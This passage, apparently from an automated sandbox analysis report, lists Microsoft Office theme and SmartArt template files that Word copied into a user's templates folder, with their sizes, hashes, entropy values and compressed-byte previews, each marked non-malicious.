                                                Entropy (8bit):7.668294441507828
                                                Encrypted:false
                                                SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                                MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                                SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                                SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                                SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                                Malicious:false
                                                Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):976001
                                                Entropy (8bit):7.791956689344336
                                                Encrypted:false
                                                SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                                MD5:9E563D44C28B9632A7CF4BD046161994
                                                SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                                SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                                SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                                Malicious:false
                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                Category:dropped
                                                Size (bytes):1463634
                                                Entropy (8bit):7.898382456989258
                                                Encrypted:false
                                                SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                                MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                                SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                                SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                                SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                                Malicious:false
                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):2218943
                                                Entropy (8bit):7.942378408801199
                                                Encrypted:false
                                                SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                                MD5:EE33FDA08FBF10EF6450B875717F8887
                                                SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                                SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                                SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                                Malicious:false
                                                Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):1750795
                                                Entropy (8bit):7.892395931401988
                                                Encrypted:false
                                                SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                                MD5:529795E0B55926752462CBF32C14E738
                                                SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                                SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                                SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                                Malicious:false
                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033927[[fn=Main Event]].thmx (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):2924237
                                                Entropy (8bit):7.970803022812704
                                                Encrypted:false
                                                SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                                MD5:5AF1581E9E055B6E323129E4B07B1A45
                                                SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                                SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                                SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                                Malicious:false
                                                Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033929[[fn=Slate]].thmx (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):2357051
                                                Entropy (8bit):7.929430745829162
                                                Encrypted:false
                                                SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                                MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                                SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                                SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                                SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                                Malicious:false
                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033937[[fn=Vapor Trail]].thmx (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):3611324
                                                Entropy (8bit):7.965784120725206
                                                Encrypted:false
                                                SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                                MD5:FB88BFB743EEA98506536FC44B053BD0
                                                SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                                SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                                SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                                Malicious:false
                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001114[[fn=Gallery]].thmx (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):1091485
                                                Entropy (8bit):7.906659368807194
                                                Encrypted:false
                                                SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                                MD5:2192871A20313BEC581B277E405C6322
                                                SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                                SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                                SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                                Malicious:false
                                                Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001115[[fn=Parcel]].thmx (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):608122
                                                Entropy (8bit):7.729143855239127
                                                Encrypted:false
                                                SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                                MD5:8BA551EEC497947FC39D1D48EC868B54
                                                SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                                SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                                SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                                Malicious:false
                                                Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328884[[fn=architecture]].glox (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):5783
                                                Entropy (8bit):7.88616857639663
                                                Encrypted:false
                                                SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                                MD5:8109B3C170E6C2C114164B8947F88AA1
                                                SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                                SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                                SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                                Malicious:false
                                                Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328893[[fn=BracketList]].glox (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):4026
                                                Entropy (8bit):7.809492693601857
                                                Encrypted:false
                                                SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                                MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                                SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                                SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                                SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                                Malicious:false
                                                Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328905[[fn=Chevron Accent]].glox (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):4243
                                                Entropy (8bit):7.824383764848892
                                                Encrypted:false
                                                SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                                MD5:7BC0A35807CD69C37A949BBD51880FF5
                                                SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                                SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                                SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                                Malicious:false
                                                Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328908[[fn=Circle Process]].glox (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                Category:dropped
                                                Size (bytes):16806
                                                Entropy (8bit):7.9519793977093505
                                                Encrypted:false
                                                SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                                MD5:950F3AB11CB67CC651082FEBE523AF63
                                                SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                                SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                                SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                                Malicious:false
                                                Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328916[[fn=Converging Text]].glox (copy)

                                                Download File
